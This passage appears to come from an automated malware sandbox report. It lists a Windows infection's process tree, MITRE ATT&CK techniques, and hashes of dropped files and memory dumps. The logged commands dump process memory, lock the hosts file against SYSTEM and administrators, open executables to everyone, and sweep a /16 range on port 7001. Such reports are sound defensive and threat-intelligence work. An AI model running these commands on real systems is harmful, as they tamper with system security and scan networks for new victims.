  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2664 C:\Windows\TEMP\ctvlnlili\2664.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4256
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2828 C:\Windows\TEMP\ctvlnlili\2828.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3584
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3144 C:\Windows\TEMP\ctvlnlili\3144.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4428
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3872 C:\Windows\TEMP\ctvlnlili\3872.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3064
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3956 C:\Windows\TEMP\ctvlnlili\3956.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4892
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 4028 C:\Windows\TEMP\ctvlnlili\4028.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1056
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 648 C:\Windows\TEMP\ctvlnlili\648.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4532
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 5012 C:\Windows\TEMP\ctvlnlili\5012.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3228
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 1652 C:\Windows\TEMP\ctvlnlili\1652.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4052
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 1260 C:\Windows\TEMP\ctvlnlili\1260.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2704
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3692 C:\Windows\TEMP\ctvlnlili\3692.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3028
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 4636 C:\Windows\TEMP\ctvlnlili\4636.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4260
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3304 C:\Windows\TEMP\ctvlnlili\3304.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4776
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2204 C:\Windows\TEMP\ctvlnlili\2204.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\ctvlnlili\rzvrtrlue\scan.bat
  2⤵
  PID:5028
- - C:\Windows\ctvlnlili\rzvrtrlue\gepmrvmba.exe
    gepmrvmba.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:4052
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 5028 C:\Windows\TEMP\ctvlnlili\5028.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6344
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3032 C:\Windows\TEMP\ctvlnlili\3032.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:3756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4504
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:60
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:3124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:6400
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:1936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4364,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:8
1⤵
PID:3116

C:\Windows\SysWOW64\yqiwma.exe
C:\Windows\SysWOW64\yqiwma.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2008

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ncnrnqz.exe
1⤵
PID:3180
- C:\Windows\ime\ncnrnqz.exe
  C:\Windows\ime\ncnrnqz.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4620

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F
1⤵
PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3972
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F
  2⤵
  PID:4468

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F
1⤵
PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3324
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F
  2⤵
  PID:3840

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ncnrnqz.exe
1⤵
PID:4988
- C:\Windows\ime\ncnrnqz.exe
  C:\Windows\ime\ncnrnqz.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6356

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F
1⤵
PID:5360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1084
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F
  2⤵
  PID:6172

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F
1⤵
PID:5672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5456
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F
  2⤵
  PID:5076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\ctvlnlili\1260.dmp

Filesize
8.7MB

MD5
1d3d84528cd7e2bbdb9408dbc0bb6a24

SHA1
e1a50fb9b9c5b3c49ee2d36ae341bc76c0264a3f

SHA256
0b9bd4f3155319b761bce9bc3d342b050a862e4f0df74031983825300381d039

SHA512
d7629125d2560f28825335013cde089bee481b38c204b2d0d09502aaf1073a17c5961475c84c3cd9cb2ec47b0ca6550658893714edb09b131b7b72a7bb6b9f80

Download Submit
C:\Windows\TEMP\ctvlnlili\1652.dmp

Filesize
26.0MB

MD5
8524ede669cd04382dd97d54b7f94eec

SHA1
5d73e7a69834febf83c76e1385ce53241a4bd351

SHA256
d0b13b476e27fa006bd0360330aac203c13de686b21ed5c0f1a4913e5aa7b43f

SHA512
afc99c6d7380020ef336c5a9c983b4b22d1a58652358bf432ba483e37995404dc99d62834ab5eea6fa234aee015ae750d275d1135293dfea0c56dd3fdaed38c2

Download Submit
C:\Windows\TEMP\ctvlnlili\2140.dmp

Filesize
4.2MB

MD5
6db067f89734159704b6372be48a37fd

SHA1
e36fa107fdee4aa95769a41b4bd5fdeda66eb76e

SHA256
ee7fb8cf13f437516a33c6eb4e30eef972bc24bd1f02c3660dfe1b626b48426b

SHA512
cf5a94e9a0b2e17b56d6004e7b4652895014a7fdca433f30ae82993fff3325fc7c1bead06f7e5f234912fa6df8725bf478bb78432f622be2fa5f857d0f598e43

Download Submit
C:\Windows\TEMP\ctvlnlili\2552.dmp

Filesize
4.0MB

MD5
a00caf68af5ad06e965955fc6952ce26

SHA1
514000bb89280625cddd8cd3da6106eab3e71d4f

SHA256
a169787caef47cf53787f3e7eea630cbfc6c343ea428f97321f6c78274b0b177

SHA512
14e38f8a4ade3dd377bc80a0dda0aa954c32455362a01b145e9d28e21674fade755503344ed7d24ab2f965f40b7eed5dd849338809e05bce2d5ff932430c8e91

Download Submit
C:\Windows\TEMP\ctvlnlili\2664.dmp

Filesize
2.9MB

MD5
ce7c7157b12d6b1a36fe9dc09cebc8b7

SHA1
0e7a7002d6cb9b14de63051db116a442bf316c82

SHA256
e4c660f1175601a0b35e4c51ae59246ff90aabf85692df0f3cace22508beba59

SHA512
99d0bdf2ab47db0d4f572190af192cdbfd0854ae35e0907d8f60f6364864537956e2845717aa676e38ae0476124ba8443f37efccfeadeb293f6c458c6b17634f

Download Submit
C:\Windows\TEMP\ctvlnlili\2828.dmp

Filesize
7.4MB

MD5
f50d13cb5268a2aff23483835c65f2f0

SHA1
3167f93e6645551859f7a2b627256753568b6143

SHA256
8ff31cd5028a6b0bfc5c5e7626b35e1a671d48f74bfc53d6cfa6c6443ace5d07

SHA512
39b30f73d681760603efc4f52717e97e2c340a682048f5548583707e715c59d986fb3f2495a198fc16dac51b8c655ab70cedda920766ed1201730eeac4cefd94

Download Submit
C:\Windows\TEMP\ctvlnlili\3144.dmp

Filesize
818KB

MD5
49646c57011396ce7b90acda845d9a3c

SHA1
bede522ab6990773ea62066165add069a5b87b19

SHA256
0b51f9f7ee208a42923d7269e3e9fc5b065a114b9c14e4f6b8ca0fd2471723ad

SHA512
d06c861eb9048fa0126413c4b59be1c6709cc8eed390e7d8c22878690a7ab9c98e45479511df3447d7e5dac7265a965dab5e95257310d0056b37700a59acd7ae

Download Submit
C:\Windows\TEMP\ctvlnlili\332.dmp

Filesize
33.2MB

MD5
f26c7e638e92a52484c13caf4549d301

SHA1
f955669df79c00945a75f615039267c91db3ae33

SHA256
400022e3036c2c418e80f704627f46e4b1d672ae33fbf58efb29f1f280059974

SHA512
df32ef2efd2be1f0abd373334a35845de41c9a121abe9bbd9c371984900c02bce2b64253ba4709e315d74a761303476a4ac76a0876fe97540586fb9c849cff05

Download Submit
C:\Windows\TEMP\ctvlnlili\3692.dmp

Filesize
27.5MB

MD5
12b34c6f436bf0f1346ffd5404d3661d

SHA1
b32e667191c7f880c810a7176ab81cefae90e598

SHA256
91418434c3f0957446f0d5226166730d48655d84c6f0e185fed2c2c95a3bab9e

SHA512
9bf471a596463cfec6bce5daada93a3725ba3ba2e958444ceca36585102fa46673c2476f34831f64e7ecb416847aebe3cb68eb2ecb361be2fb897e844797fc26

Download Submit
C:\Windows\TEMP\ctvlnlili\3872.dmp

Filesize
2.7MB

MD5
0d524e967027770a3f7c9c4c6f8923a4

SHA1
6b4643c6aacca967a89552b474b7b4bb58867b8d

SHA256
969587d4423e97f5a6dc4d9e62574ea788aa7992659a54e7bc86fc4f8ed6c175

SHA512
9aee34b170fb34a5dd6c6835f480c0efc7ca74f65bdde3b7d47bdc6d8e2c3a8fdba8e62ca02bb71e4ff746ce1e62bea798e343110faa6641b3a3a51bee6c3e17

Download Submit
C:\Windows\TEMP\ctvlnlili\3956.dmp

Filesize
21.2MB

MD5
6e8e6bfdeba067c86e6237477d33761c

SHA1
8cd35668b98447fceaff24e6d4aa5c34a3f71bae

SHA256
ffdefacaa235fc8a0042b9b8cde7a8012e5323c7c385ae5ba786788f2ce823a1

SHA512
554be954c472db7d9a06f0a9e9c22b73b230984fbab171750b1d700d4f52d5f6f56112724056483243074ebea91cdd1083fa5ab966eb916aaff2b7a17b00d536

Download Submit
C:\Windows\TEMP\ctvlnlili\4028.dmp

Filesize
8.5MB

MD5
30dc1e2781c7eb0229b1c5db8728fb98

SHA1
181af92a72077591820de8de1d2aae47d9e763d5

SHA256
6b7aa686bcd8e5a21fe8eed8a0499d9e2a10bf1ff8f16bc15a3b68f1e30dc62d

SHA512
e038ae344402f769ec8b13eb3d35314ee7d018c9133870c4687896dc67ff9ca0ed09e5b5af5e9af7231d3d18f04dd2a5e9981539a126d0a90e2ba01c7d22585d

Download Submit
C:\Windows\TEMP\ctvlnlili\5012.dmp

Filesize
1.2MB

MD5
1e24fde6b3327b3b3deca0c64fc0732c

SHA1
6f926277397cef74a0c46c6175905ea191d6bcad

SHA256
607a52498be3eaae216c2f0dac12e0b4577e7070f6b22ff28b6860c56bbb75e1

SHA512
9d63d520f9ee32d1b9bbe9da7bbf5d00198cbb733c417ea6b6a5140f8f77c6eb59bbe548b6ab2cf40a45169048462fffeecbad293ce6c597ef6f64581f538ac4

Download Submit
C:\Windows\TEMP\ctvlnlili\648.dmp

Filesize
45.7MB

MD5
501d63126c961970990282cf95a90dfc

SHA1
90bb108d3ec752d9067ff3d714bb74c4a375bc65

SHA256
17e370be44e511e5b5991313cfeec7466bd6daa70324b78f039e171b59ea41b0

SHA512
60871a5e8c744556f7190b65c9ed57fa276b5063adef8ef90a99587ef0cc95bda6b0143a66fdea1b055b875cb060fa98dd3c6525a793564a2d640d6eb0ad7ee1

Download Submit
C:\Windows\TEMP\ctvlnlili\792.dmp

Filesize
2.0MB

MD5
d18230cea201e4e46992765d7e2efa98

SHA1
af10670bb633523480a6427cc04953e395e2df99

SHA256
4aef71d7afdff23b65384fd7c20a5d88dae6bbd5e18c85665214954657f765c1

SHA512
9483526662360848209f57a6dd2684fcb52fb9afa9981e5c1b0a46e678c574aeac668629f5527aabbb8d3eefd3caffb82dcde9d9a3f24b1a6c7c997858074077

Download Submit
C:\Windows\TEMP\pmrlgkemu\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\Temp\ctvlnlili\mtlvznziz.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\nsi25F4.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsi25F4.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\pmrlgkemu\jrvvrz.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\ctvlnlili\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\kvialcmr\ncnrnqz.exe

Filesize
9.1MB

MD5
a5d01a4f4e42451c38ad484115c3988f

SHA1
d837ccc8e38dde0c235129ff6b4018fa2e552e52

SHA256
0d24654b670633b65402b2ff56b0a6262eb2810560594db8287b113285bd6956

SHA512
a336b8dbbcc788a4a2f329998ddc6f67128c87e4aa01ec60a2c08d3393096d4d0609b046fc231b303c47f412c487414ddf459150698a240bfdd97c0232ac0b9d

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
memory/1056-206-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/1924-78-0x0000000000EA0000-0x0000000000EEC000-memory.dmp

Filesize
304KB

Download
memory/2296-179-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/2416-171-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/2704-224-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/3016-136-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp

Filesize
952KB

Download
memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp

Filesize
952KB

Download
memory/3028-228-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/3064-197-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/3228-215-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/3324-253-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/3340-150-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/3340-142-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/3584-188-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/3792-152-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/3792-165-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4052-219-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/4052-248-0x0000000000090000-0x00000000000A2000-memory.dmp

Filesize
72KB

Download
memory/4156-175-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/4168-200-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-182-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-212-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-164-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-262-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-260-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-194-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-221-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-257-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-255-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-168-0x0000017A222B0000-0x0000017A222C0000-memory.dmp

Filesize
64KB

Download
memory/4168-254-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-232-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4168-251-0x00007FF702680000-0x00007FF7027A0000-memory.dmp

Filesize
1.1MB

Download
memory/4256-184-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/4260-234-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/4428-192-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/4532-210-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/4576-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4728-238-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/4740-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4740-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4776-236-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/4892-202-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download
memory/6344-250-0x00007FF771380000-0x00007FF7713DB000-memory.dmp

Filesize
364KB

Download